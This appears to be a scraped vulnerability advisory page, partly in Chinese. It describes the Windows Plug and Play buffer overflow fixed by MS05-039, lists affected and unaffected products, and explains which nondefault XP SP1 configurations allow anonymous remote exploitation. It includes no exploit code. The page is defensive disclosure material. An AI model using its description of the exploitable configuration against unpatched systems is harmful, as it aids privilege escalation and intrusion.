Cisco Building Broadband Service Manager (BBSM) 4.4
Cisco Building Broadband Service Manager (BBSM) 4.3
Cisco Building Broadband Service Manager (BBSM) 4.2
Cisco Building Broadband Service Manager (BBSM) 4.0.1
Cisco Building Broadband Service Manager (BBSM) 3.0
Cisco Building Broadband Service Manager (BBSM) 2.5.1
Cisco Broadband Troubleshooter
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98

- 不受影响的程序版本

Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98

- 漏洞讨论

Microsoft Windows Plug and Play (PnP) is prone to a buffer-overflow vulnerability.

This issue takes place when the PnP service handles malformed messages containing excessive data.

This vulnerability may allow local attackers to escalate privileges and remote attackers to gain unauthorized access, depending on the underlying operating system. A successful attack may allow arbitrary code to run, resulting in the attacker gaining SYSTEM privileges.

UPDATE (8/23/2005): While investigating this vulnerability, the DeepSight Threat Analyst Team has been able to carry out anonymous remote exploitation against certain nondefault configurations of Windows XP SP1. The attack vector appears when the "Guest" account is both enabled and removed from the "Deny access to this computer from the network" entry in the "User Rights Assignment" Security Policy. This can happen when Simple File and Print Sharing has been enabled, for example by sharing a folder or a printer with the local network. Note that Simple File and Print Sharing is available only on Windows XP machines that are not part of a Windows Active Directory Domain. However, configuring a Windows XP SP1 host to share network resources prior to joining an Active Directory Domain will leave it in the vulnerable state even after the Domain is joined.

Note also that Windows XP SP2 is not prone to this exploitation method. Furthermore, there is no change to Microsoft Security Bulletin MS05-039. Customers who have deployed this update are protected from this issue.

In light of this finding, Microsoft has issued new information regarding the patch for the Microsoft Windows Plug and Play Buffer Overflow Vulnerability (see Security Bulletin 906574: http://www.microsoft.com/technet/security/advisory/906574.mspx).

- 漏洞利用

The researchers responsible for discovering this issue have developed exploit code.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploits are available:

- 解决方案

Microsoft has released fixes to address this vulnerability in supported platforms.

Cisco has release a security notice detailing their mitigation recommendations with regard to this vulnerability.


Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows XP Home SP1

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows Server 2003 Standard x64 Edition

Microsoft Windows 2000 Professional SP4

Microsoft Windows XP Media Center Edition SP2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站